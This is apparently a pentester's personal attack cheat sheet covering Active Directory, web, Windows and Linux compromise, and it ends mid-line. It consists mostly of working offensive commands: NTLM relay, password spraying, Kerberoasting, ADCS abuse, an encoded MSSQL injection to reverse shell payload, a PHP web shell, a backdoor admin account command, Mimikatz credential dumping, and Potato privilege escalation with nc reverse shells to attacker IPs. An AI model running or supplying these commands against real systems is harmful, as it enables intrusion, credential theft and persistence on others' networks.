- Setup
- Active Directory Assessment
- Web Assessment
- First Access Assessment
- Network Discovery & Scanning
- Windows Host Assessment
- Linux Host Assessment
- Fix Terrible Potato Shell
- Enable WinRM (probably via RDP)
- Credential Harvesting & Cracking
- SMB Enumeration & Looting
- Pivoting & Tunneling (All in one place)
- Remote Execution & Lateral Movement
- Shells & TTY Improvements
- File Transfer & Collection
- Metasploit / Payloads
- BloodHound (Linux)
- Misc Utilities
- References & Links
apt update
apt install setuptools wheel golang-go git jq eyewitness requests_toolbelt typer requests_ntlm --fix-missing
apt remove python3-httpx responder
python3 -m pip uninstall httpx --break-system-packages
# Binaries via Go
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/lkarlslund/ldapnomnom@latest
go install github.com/ropnop/kerbrute@latest
# Tools
python3 -m pip install sprayhound --break-system-packages
git clone https://github.com/Macmod/godap && cd godap && go install .
echo 'export PATH=$PATH:/root/go/bin:/root/.local/bin' >> ~/.zshrc && source ~/.zshrc
pipx install git+https://github.com/lgandx/Responder.git
pipx install git+https://github.com/garrettfoster13/sccmhunter/
git clone https://github.com/lefayjey/linWinPwn && cd linWinPwn
pipx ensurepath
chmod +x install.sh && ./install.sh
# testssl
git clone --depth 1 https://github.com/testssl/testssl.sh.git --branch 3.3dev
# discord uploader (linux)
git clone https://github.com/fieu/discord.sh/
echo 'export WEBHOOK="https://discord.com/api/webhooks/..."' >> ~/.zshrc && source ~/.zshrcChecks:
- Use Responder
- Check SMB signing False
- Check LDAP signing False
- Check password policy
- Check Machine Account Quota
- Run Nessus and review vulns
- Eyewitness all web services
- Check all printers for LDAP and E-mail (SMTP) creds
No Creds:
- ldapnomnom or nxc -t DC_IP -u '' -p '' --users
- Check SMBs with Guest / without user
- Check AD login with Guest (godap)
- Fake Machine Creation via DHCP Poisoning
- Check FTP with anonymous:anonymous
Creds:
- Spray users with obtained Passwords!
- Try WinRM auth with each obtained user
- Fake Machine Creation via impacket-addcomputer
- Check SMBs with obtained users
- Kerberoasting & AS-REP Roasting (all ADs)
- Test user=pass with kerbrute
- Known vulns with netexec or linWinPwn
- Check ADCS
- Check Domain Users description
- Run BloodHound
- Run PingCastle (Windows)
- Run sccmhunter.py
Also:
- See: https://hideandsec.sh/books/cheatsheets-82c/page/active-directory
- See: https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
- Video: https://youtu.be/b0lLxLJKaRs
.\PingCastle.exe --healthcheck --user "kali.nathalie@host.com" --password "pass" --server host.comresponder -I eth0 -wd
cat *SSP*.txt \
| grep -vF '$' \
| sort -u \
| awk -F'::' '!seen[$1]++' \
> ntlmv2_ssp.txt
cat $(ls *NTLMv2*.txt | grep -v 'SSP') \
| grep -vF '$' \
| sort -u \
| awk -F'::' '!seen[$1]++' \
> ntlmv2.txt
awk -F'::' 'NR==FNR { ssp[$1]=1; next } !ssp[$1]' ntlmv2_ssp.txt ntlmv2.txt > ntlmv2.tmp && mv ntlmv2.tmp ntlmv2.txt#!/usr/bin/env python3
import sys
def users(path):
s = set()
with open(path, encoding="utf-8", errors="ignore") as f:
for line in f:
if "::" in line:
u = line.split("::", 1)[0].strip()
if u:
s.add(u)
return s
def diff(bigger, smaller, out_path):
existing = users(smaller)
with open(bigger, encoding="utf-8", errors="ignore") as fin, \
open(out_path, "w", encoding="utf-8", errors="ignore") as fout:
for line in fin:
if "::" in line:
u = line.split("::", 1)[0].strip()
if u not in existing:
fout.write(line)
if __name__ == "__main__":
bigger = sys.argv[1]
smaller = sys.argv[2]
out_path = sys.argv[3] if len(sys.argv) > 3 else "ntlmv2_ssp_diff.txt"
diff(bigger, smaller, out_path)Xerox:
admin:1111
admin:admin
admin:1234
HP OfficeJet Pro:
Settings->Email Alerts->Email Server
RICOH:
admin:<blank>
Device Management->Configuration->Device Settings
- Email
- File Transfer
- User Authentication Management
- Administrator Authentication Management
- LDAP Server
- Kerberos Authentication
Zebra:
Print Server Settings -> Print Server -> admin:1234
Lexmark:
Settings->Security->Security Setup
Settings->E-mail
http://<ip>/webglue/content?c=%2FSettings%2FEmail
http://<ip>/cgi-bin/dynamic/printer/config/net/email.html
DataMax:
Nothing relevantnxc smb smb-hosts.txt -u user -p pass -d domain
nxc ldap ldap-hosts.txtADD computer: responder -I eth0 -Pdv; ntlmrelayx.py -t ldaps://10.200.85.10 -wh attacker-wpad --no-smb-server --add-computer
Get Hashes: responder -I eth0 -Pdv; ntlmrelayx.py -t ldap://<IP> -wh attacker-wpad -dh -smb2support --no-multirelay --keep-relaying
Get LDAP Shell: responder -I eth0 -Pdv; ntlmrelayx.py -t ldap://<IP> -wh attacker-wpad -smb2support -iBlackbox username discovery:
wget https://github.com/danielmiessler/SecLists/raw/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
mv xato-net-10-million-usernames.txt 10kk_usernames.txt
ldapnomnom --input 10kk_usernames.txt --output users_found.txt --dnsdomain domain.local --maxservers 32 --parallel 16Password policy and spraying:
# Policy
netexec smb 10.100.207.24 -d domain.local -u user -p pass --pass-pol
# Spray (sprayhound + netexec filtering failures)
sprayhound -U users.txt --lower -d domain.local -dc 172.20.100.100
netexec smb 192.168.1.101 -u users.txt -p Summer18 --continue-on-success | grep -v 'STATUS_LOGON_FAILURE'User = Pass quick check:
for i in $(cat users_found.txt); do echo "$i:$i"; done > useraspasswd.txt
kerbrute bruteforce useraspasswd.txt -d domain.local --dc 10.100.207.24 -t 5 --safeSafe spray wrapper (limit lockouts):
#!/bin/bash
# safe-spray.sh
if [ "$#" -ne 4 ]; then
echo "Uso: $0 <target> <arquivo_usuarios> <senha> <limite_lockout>"
echo "Exemplo: $0 192.168.1.24 users.txt 'Senha123' 10"
exit 1
fi
TARGET="$1"; USERFILE="$2"; PASSWORD="$3"; LOCKOUT_LIMIT="$4"; LOCKED=0
netexec smb "$TARGET" -u "$USERFILE" -p "$PASSWORD" --continue-on-success 2>&1 \
| grep -v 'STATUS_LOGON_FAILURE' | while read line; do
echo "$line"
if echo "$line" | grep -q "STATUS_ACCOUNT_LOCKED_OUT"; then
LOCKED=$((LOCKED + 1))
echo "[!] Lockout detectado! Total: $LOCKED"
if [ "$LOCKED" -ge "$LOCKOUT_LIMIT" ]; then
echo "[!] Limite de lockouts atingido ($LOCKED). Abortando ataque!"
pkill -f "netexec smb $TARGET"
break
fi
fi
donenxc ldap 10.200.68.3 -u user -p 'pass' --asreproast ASREProastables.txt --kdcHost 10.200.68.3
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 10.200.68.3 secura.yzx/charlotte:'Game2On4.!'nxc ldap 10.200.68.3 -u user -p 'pass' -k --kerberoasting kerberoasting.hashes
GetUserSPNs.py -request -dc-ip 192.168.54.97 secura.yzx/charlotte:'Game2On4.!'
hashcat -m 13100 --force -a 0 hashes /usr/share/wordlists/rockyou.txtcertipy find -u 'user@domain.htb' -p '123' -dc-ip 10.22.20.121 -ns 10.22.20.121 -vulnerable -enabled -dns-tcp -output vulns.local
# ESC8 reference: https://www.hackingarticles.in/adcs-esc8-ntlm-relay-to-ad-cs-http-endpoints/
# Example ESC1-ish request (UPN abuse)
certipy req -username 'KaliPC$' -password 'Password#1' -ca AUTHORITY-CA -target authority.authority.htb -dc-ip 10.129.229.56 -template CorpVPN -upn administrator@authority.htb -debug
# Split PFX
certipy cert -pfx administrator.pfx -nokey -out user.crt
certipy cert -pfx administrator.pfx -nocert -out user.key
# Pass-the-Cert LDAP shell
python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.129.229.56sccmhunter find -u kali.nathalie -p '123123' -d domain.com -dc-ip 10.200.68.3
sccmhunter smb -u kali.nathalie -p '123123' -d domain.com -dc-ip 10.200.68.3 -saveunbuffer nxc smb ldap-servers.txt -M zerologon -M printnightmare -M smbghost -M ms17-010 -M coerce_plus | grep --color=never -Ev "ERROR|STATUS_ACCESS_DENIED"
nxc smb ldap-servers.txt -d domain -u 'user' -p 'pass' -M nopac -M ntlm_reflection -M spooler -M webdavcat targets.txt | grep -w 21 | grep -vE '\.21' | awk '{print $1}' > ftp-hosts.txtwhile read host; do
echo "===== $host ====="
timeout 10 ftp -inv "$host" <<EOF
user anonymous anonymous@
ls
bye
EOF
echo
done < ftp-hosts.txtCreate computer (requires rights):
impacket-addcomputer -computer-name 'KaliPC$' -computer-pass 'Password#1' -dc-host 10.129.229.56 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'List domains from a file of IPs:
#!/bin/bash
# list-domains.sh
ARQUIVO="$1"
[ ! -f "$ARQUIVO" ] && { echo "Arquivo '$ARQUIVO' não encontrado!"; exit 2; }
while IFS= read -r ip || [ -n "$ip" ]; do
[ -z "$ip" ] && continue
echo "🔎 Verificando $ip..."
ldapsearch -x -H ldap://"$ip" -s base namingContexts 2>/dev/null | \
awk -F= '/^namingContexts: DC=/ { gsub(/,DC=/, ".", $0); split($0, parts, ": "); print " → " parts[2] }'
echo
done < "$ARQUIVO"godap (Guest / creds):
# No creds
godap IP
# DOMAIN\user
godap IP -u 'DOMAIN\\user' -p 'Welcome123!'
# user@DOMAIN
godap IP -u 'user@DOMAIN' -p 'Senha'bloodyAD:
Add User to Group:
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 add groupMember 'service accounts' <user>
Set SPN:
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 set object <user> servicePrincipalName -v 'http/whatever'
Shadow Credential:
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 set owner <target_user> <user>
bloodyAD -u <user> -p pass -d domain.htb --host 10.10.10.10 add genericAll <target_user> <user>
certipy shadow auto -target 10.10.10.10 -u <user> -p pass -account <target_user>Checklist:
User Enum (login/register)
SSL/TLS
Password Recovery
Security Headers
Rate-Limit/CAPTCHA
Improper Error Handling
Directory Fuzzing and Wayback Machine
HTML Injection/XSS/SSTI
Password Policy
SQLI
CSRF
XSS (dangerouslySetInnerHTML, innerHTML, outerHTML, insertAdjacentHTML)
API and endpoints in JS
Build list of web hosts from Nmap outputs & screenshot with EyeWitness:
awk '
function out(){if(ip && port!=""){k=ip ":" port;if(!seen[k]){print k;seen[k]=1}}}
/^Nmap scan report for/ {gsub("[()]", "", $NF);ip=$NF;port=""}
/^[0-9]+\/tcp/ {
split($1,p,"/");port="";
if($2 ~ /open/) port=p[1];
if(ip && port!="") for(i=3;i<=NF;i++) if(tolower($i) ~ /http/){out();break}
}
/http-title/ || /HTTP\/[0-9]\.[0-9]/ || /HTTP\/2/ || /Content-Type: text\/html/ || /<html[ >]/ {out()}
' *.txt > http-hosts.txt
httpx -l http-hosts.txt -o httpx-hosts.txt
eyewitness -f httpx-hosts.txt -d screen --delay 8Basic Directory fuzzing
ffuf -w /usr/share/dirb/wordlists/directory-list-2.3-medium.txt -u http://192.168.159.120/FUZZ -mc 200-299,300-309,401,403,405,500 -c
python3 dirsearch.py -u 192.168.173.245Advanced Directory fuzzing with ffuf (script):
#!/bin/bash
# run-ffuf.sh
if [ $# -ne 2 ]; then
echo "Use: $0 <hosts_file> <wordlist>"
exit 1
fi
HOSTS_FILE="$1"
WORDLIST="$2"
STATUSCODES="200-299,301,302,307,401,403,405,500"
USERAGENT="Mozilla/5.0 (Linux; Android 13; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36"
[ ! -f "$HOSTS_FILE" ] && { echo "Can't find '$HOSTS_FILE'!"; exit 2; }
[ ! -f "$WORDLIST" ] && { echo "Can't find '$WORDLIST'!"; exit 3; }
while IFS= read -r HOST || [ -n "$HOST" ]; do
echo "[*] Running ffuf on httpx://$HOST/FUZZ"
ffuf -w "$WORDLIST" -u "$HOST/FUZZ" -mc "$STATUSCODES" -c -H "User-Agent: $USERAGENT" -ac
done < "$HOSTS_FILE"Mirror a directory listing (limit files <=10MB):
sudo apt install -y httrack
httrack 'http://172.21.101.25/global/' -O ./mirror-listagem "-*" "+http://172.21.101.25/global/*" "-*[>10240]"Microsoft SQLI to RCE:
1'%3b%20EXEC%20sp_configure%20'show%20advanced%20options',1;RECONFIGURE;EXEC sp_configure%20'xp_cmdshell',1;RECONFIGURE;%20--
nc -vnlp 1337
1'%3b%20EXEC%20xp_cmdshell%20'powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='%20%3b%20--Checklist:
Check "<Service Name/port> exploit RCE" on Google
Check "nc -vvv <host> <port>" for each weird service; Then try "help" or something like that
Check hacktricks for each port
Fuzzing all the web services
Make sure to fix the exploits, use different exploits, and change the LPORT to 443, 80, 22 if ist't working
Last option: Bruteforce
mkdir scan && cd scan
# Discover hosts from ranges
nmap -sn -T2 -PR -iL ranges.txt --excludefile exclude.txt -oG - | awk '/Status: Up/{print $2}' > hosts.txtMasscan (full port sweep):
masscan -p1-65535 --rate=2000 -e eth0 -iL hosts.txt -oG nmap.gnmapNmap:
Slow(Real World):
nmap -p- -n -Pn -v -iL hosts.txt -oG nmap.gnmap -T1
Fast(CTF):
nmap -p- --min-rate 10000 -Pn -v -n -iL hosts.txt -oG nmap.gnmap
nmap -p- --min-rate 10000 -sU -Pn -v -n -iL hosts.txt -oG nmap.gnmap (If ther is no relevant things on TCP)Build targets.txt (ip ports):
awk '/Ports:/{ if ($1=="Host:") { ip=$2; start=5 } else if ($1=="Timestamp:"){ ip=$4; start=4 } gsub(/[()]/,"",ip); for(i=start;i<=NF;i++){ if ($i ~ /\/open\//){ gsub(/,$/,"",$i); split($i,a,"/"); ports[ip] = (ports[ip] ? ports[ip]","a[1] : a[1])}}} END{ for (ip in ports) print ip, ports[ip]}' nmap.gnmap | sort -V > targets.txt
mkdir -p output
while read line; do
ip=$(echo $line | cut -d' ' -f1)
ports=$(echo $line | cut -d' ' -f2 | sed 's/^,//')
nmap -v -Pn -sV --script "default and safe and not intrusive and not brute and not broadcast" -p "$ports" "$ip" -oN "output/nmap_${ip}.txt"
done < targets.txt# Prep
RunWithRegistryNonAdmin.bat
. .\PowerView.ps1
# Forest domains
Get-ForestDomain -Verbose
# Users / Computers
Get-DomainUser | Select-Object -ExpandProperty samaccountname
Get-DomainComputer | Select-Object -ExpandProperty dnshostname
# Domain Admins
Get-DomainGroupMember -Identity "Domain Admins"
# OUs
Get-DomainOU | Select-Object -ExpandProperty name
# Delegations
Get-DomainComputer -Unconstrained | Select-Object -ExpandProperty name
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# SIDs
Get-DomainSid; Get-DomainSid -Domain finance.corpwhoami
whoami /groups
whoami /priv
CHECK C:\Windows.old (dir C:\)
ipconfig /all
route print
netstat -ano
net localgroup Administrators
Get-LocalUser
Get-LocalGroup
Get-Process
cd C:\Users && tree . /f
Check C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
WinPeas
Mimikatz
xampp pentest:
check xampp\htdocs
check C:\xampp\mysql\bin\mysql.exe -h <username> -u <pass> <db>
check `icacls htdocs`, check for authority system, and then, Set-Content -path 0xdf.php -Value '<?php system($_REQUEST["cmd"]); ?>'
Get-ChildItem C:\xampp -Recurse -File | Select-String 'administrator' | Select-Object -Unique Path
Get-ChildItem C:\xampp -Recurse -File | Select-String 'password' | Select-Object -Unique Pathnxc winrm hosts.txt -u users.txt -p <pass> --continue-on-success
nxc rdp hosts.txt -u users.txt -p <pass> --continue-on-success
nxc smb hosts.txt -u users.txt -p <pass> --continue-on-success
nxc ldap hosts.txt -u users.txt -p <pass> --continue-on-success
nxc mssql hosts.txt -u users.txt -p <pass> --continue-on-successuname -a
sudo -l
linpeas
pspy
reuse SSH credentials
check /opt
check /home/<USER>/files
Try "su <user>" with each obtained password
DirtyPipe:
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploitsnet user kalihacker kalihacker123 /add & net localgroup administrators kalihacker /add & net localgroup "WinRMRemoteWMIUsers__" kalihacker /add & net localgroup "Remote Management Users" kalihacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
nxc winrm 192.168.238.170 -u 'kalihacker' -p 'kalihacker123' --local-auth
or
net user administrator kalihacker123Enable-PSRemoting -ForceList files recursively (Windows):
gci -recurseFix Windows→Linux line endings:
dos2unix file.shLinux secret hunting (find/grep):
find / -type f -readable 2>/dev/null | while read -r file; do
grep -IEni --color=always -E 'password|passwd|pwd|user(name)?|login|credential|secret|token|key|auth' "$file" 2>/dev/null \
| cut -c -300 | sed "s|^|$file:|"
done | tee resultados_busca.txt
# Extras
trufflehog
rg -i -F --hidden password -M 1024Mimikatz (Windows PowerShell)
# Reference:
# https://tools.thehacker.recipes/mimikatz/modules
iwr('http://192.168.49.56:8000/Invoke-MimikatzPatched.ps1') -OutFile mimi.ps1
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope LocalMachine -Force
Import-Module .\mimi.ps1 -Force
Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
Invoke-Mimikatz -Command '"token::elevate" "sekurlsa::credman"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::cache /kiwi"'
Invoke-Mimikatz -Command '"token::elevate" "lsadump::cache /user:MEDTECH\joe /kiwi"' #For MsCacheV2
Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'
# CHANGE ARCHITECTURE 32 TO 64:
& "$env:WINDIR\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -NoExitCredential Dumping via netexec/secretdump
nxc smb 192.168.238.171 -u kalihacker -p kalihacker123 --local-auth --sam
nxc smb 192.168.238.171 -u kalihacker -p kalihacker123 --local-auth --lsa
impacket-secretsdump 'kalihacker':'kalihacker123'@192.168.238.171WinPeas:
iwr('http://192.168.45.245:8000/winPEASx64.exe') -OutFile winpeas.exe
.\winpeas.exe > winpeas.txt
Fix colors:
sed $'s/\u2190/\e/g' winpeas.txtHashcat (NTLMv2-SSP):
.\hashcat.exe -m 5600 -a 0 .\techboss.hash rockyou2021.txtSmall Environments like CTFs
nxc smb fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' --shares
smbclient '//10.10.11.69/IT' -U 'j.fleischman%J0elTHEM4n1990!'MANSPIDER (no download, just parse):
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
cd /root/.local/share/pipx/venvs/man-spider/lib/python3.13/site-packages/man_spider/lib/parser
# (optional tweak) edit parser.py changing 5 to 50
cat targets.txt | grep -w 445 | awk '{print $1}' > smb-hosts.txt
manspider -d domain.local -u user -p pass smb-hosts.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql -n 2>&1 | tee -a smb_complete_output.txt
awk '!seen[$0]++' smb_complete_output.txt > smb_clean.txtMANSPIDER (downloading):
manspider -d domain.local -u user -p pass servers.txt -t 10 -c passw key login user -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config xml cspkg publishsettings json cnf sql 2>&1
cd /root/.manspider
zip loot.zip -r loot
python3 -m http.serverInteresting queries:
"net use "
"-password"
"AccountPassword"
"password:"
"/user:"SMB mget (interactive client):
recurse ON
prompt OFF
mget *
# In Meterpreter
ipconfig # collect network info
background
# In msfconsole
use post/multi/manage/autoroute
set SUBNET 172.31.43.0
set session 1
exploit
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 8080
route add 172.31.43.223 255.255.240.0 1
run
# /etc/proxychains.conf (disable proxy_dns), then on your host:
socks4 127.0.0.1 8080
proxychains nmap -sV -Pn -v 172.31.43.223
# Attacker
./chisel server -p 8081 --reverse
# Target
./chisel client -v 10.10.14.2:8081 R:1080:socks
# Then use proxychainsRef: https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
Download: https://github.com/nicocha30/ligolo-ng/releases?source=post_page-----cf828e59e740---------------------------------------
Agent: Target machine
Proxy: Attacker machine (Yours)
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:443
iwr('http://192.168.45.245:8000/ligolo/agent.exe') -OutFile agent.exe
.\agent.exe -connect 192.168.45.245:443 -ignore-cert
session
start
ifconfig
sudo ip route add 172.16.159.0/24 dev ligolo
Shutdown:
sudo ip route del 172.16.159.0/24 dev ligolo
sudo ip link set ligolo down
sudo ip tuntap del dev ligolo mode tun
Double connection:
listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000curl -fsSL https://tailscale.com/install.sh | sh
sudo systemctl enable --now tailscaled
sudo tailscale up
ssh -D 1080 user@100.101.102.103nohup ssh -R 1081 -o StrictHostKeyChecking=no tunel@10.10.14.2 2>/dev/null &Foward only one port via SSH
$ ssh -i oscpb dev@192.168.183.150 -L 9000:127.0.0.1:8000
$ nc 127.0.0.1 9000
# WinRM
Enter-PSSession -ComputerName tech-dc # with current ticket/creds
# Or with creds
$pw = ConvertTo-SecureString -AsPlainText -Force -String 'SENHA-SENHA'
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList "Domain\\User",$pw
Enter-PSSession -ComputerName localhost -Credential $cred
Enter-PSSession -Id 1
Invoke-Command -ScriptBlock { whoami } -Credential $cred -ComputerName localhost:: CMD WinRM
winrs -r:tech-dc cmd
winrs -r:dcorp-mgmt "cmd /c whoami"# PsExec / Impacket
PsExec.exe \\srv.domain.local cmd
psexec.py Domain/user:pass@host comando
psexec.py Domain/user@host # will spawn a shell
# RDP
mstsc.exe
xfreerdp3 /u:yoshi /p:'Mushroom!' /v:172.16.143.82
rdesktop 172.16.143.82 -u yoshi -d medtech.com
Cheat Sheet:
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Connect:
mssqlclient.py DOMAIN/username@[Target_IP]
mssqlclient.py DOMAIN/web_svc@10.10.129.142 -windows-auth
Exec:
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
EXEC xp_cmdshell 'powershell -e <BASE64 PAYLOAD HERE>';
Find passwords:
IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits; CREATE TABLE #hits(database_name sysname, schema_name sysname, table_name sysname, column_name sysname); DECLARE @db sysname,@sql nvarchar(max); DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT name FROM sys.databases WHERE state=0 AND database_id NOT IN (1,2,3,4) AND HAS_DBACCESS(name)=1; OPEN c; FETCH NEXT FROM c INTO @db; WHILE @@FETCH_STATUS=0 BEGIN SET @sql=N'USE '+QUOTENAME(@db)+N'; INSERT INTO #hits(database_name,schema_name,table_name,column_name) SELECT DB_NAME(),s.name,t.name,c.name FROM sys.tables t JOIN sys.schemas s ON s.schema_id=t.schema_id JOIN sys.columns c ON c.object_id=t.object_id WHERE c.name LIKE ''%pass%'' OR c.name LIKE ''%pwd%'' OR c.name LIKE ''%secret%'' OR c.name LIKE ''%token%'' OR c.name LIKE ''%key%'' OR c.name LIKE ''%credential%'' OR c.name LIKE ''%auth%'' OR c.name LIKE ''%conn%'' OR c.name LIKE ''%apikey%'';'; EXEC sys.sp_executesql @sql; FETCH NEXT FROM c INTO @db; END; CLOSE c; DEALLOCATE c; SELECT * FROM #hits ORDER BY database_name,schema_name,table_name,column_name;
Find passwords with example:
IF OBJECT_ID('tempdb..##results') IS NOT NULL DROP TABLE ##results; CREATE TABLE ##results(database_name sysname, schema_name sysname, table_name sysname, column_name sysname, sample_values nvarchar(max)); DECLARE @db sysname, @sql nvarchar(max); DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT name FROM sys.databases WHERE state=0 AND database_id NOT IN (1,2,3,4) AND HAS_DBACCESS(name)=1; OPEN c; FETCH NEXT FROM c INTO @db; WHILE @@FETCH_STATUS=0 BEGIN SET @sql=N'USE '+QUOTENAME(@db)+N'; DECLARE @s sysname, @t sysname, @col sysname, @fullsql nvarchar(max), @samples nvarchar(max); DECLARE cc CURSOR FOR SELECT s.name, t.name, c.name FROM sys.tables t JOIN sys.schemas s ON s.schema_id=t.schema_id JOIN sys.columns c ON c.object_id=t.object_id WHERE c.name LIKE ''%pass%'' OR c.name LIKE ''%pwd%'' OR c.name LIKE ''%secret%'' OR c.name LIKE ''%token%'' OR c.name LIKE ''%key%'' OR c.name LIKE ''%credential%'' OR c.name LIKE ''%auth%'' OR c.name LIKE ''%conn%'' OR c.name LIKE ''%apikey%''; OPEN cc; FETCH NEXT FROM cc INTO @s, @t, @col; WHILE @@FETCH_STATUS=0 BEGIN SET @samples=''''; BEGIN TRY SET @fullsql=N''USE '+QUOTENAME(@db)+N'; SELECT @out=STUFF((SELECT '''', '''' + ISNULL(CAST(''+QUOTENAME(@col)+N'' AS NVARCHAR(500)),''''NULL'''') FROM ''+QUOTENAME(@s)+N''.''+QUOTENAME(@t)+N'' ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 20 ROWS ONLY FOR XML PATH('''''''')), 1, 2, '''''''')''; EXEC sp_executesql @fullsql, N''@out nvarchar(max) OUTPUT'', @samples OUTPUT; END TRY BEGIN CATCH SET @samples=''ERROR''; END CATCH; INSERT INTO ##results VALUES(DB_NAME(), @s, @t, @col, @samples); FETCH NEXT FROM cc INTO @s, @t, @col; END; CLOSE cc; DEALLOCATE cc;'; EXEC(@sql); FETCH NEXT FROM c INTO @db; END; CLOSE c; DEALLOCATE c; SELECT * FROM ##results ORDER BY database_name,schema_name,table_name,column_name; DROP TABLE ##results;
Change password remotely:
nxc smb 10.100.100.10 -u user -p pass -M change-password -o NEWPASS=NewPassword
changepasswd.py 'domain.local/user@10.100.100.10' -p rpc-samr (Itself)
bloodyAD -d domain.local -u 'user' -p 'pass' --host 10.100.100.10 set password "sam" "0xdf0xdf!" (For another user)Logon with existing ticket:
Enter-PSSession -ComputerName tech-dcwinrs -r:tech-dc cmdJuicy Potato:
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/CLSID.list" CLSID.list
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/test.bat" test.bat
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/JuicyPotato.exe" JuicyPotato.exe
type result.log # look for "NT SYSTEM"
juicypotato.exe -l 1234 -p nc.exe -a " -nv 10.10.14.5 1339 -e cmd.exe" -t * -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
.\JuicyPotato.exe -l 443 -p c:\windows\system32\cmd.exe -a "/c c:\Users\charlotte\Desktop\nc.exe -e cmd.exe 192.168.45.245 443" -t *God Potato:
iwr('http://192.168.45.245:8000/GodPotato-NET4.exe') -OutFile GodPotato-NET4.exe
nc -vnlp 443
.\GodPotato-NET4.exe -cmd "cmd /c nc.exe -e powershell.exe 192.168.45.245 443" #Reverse Shell
or
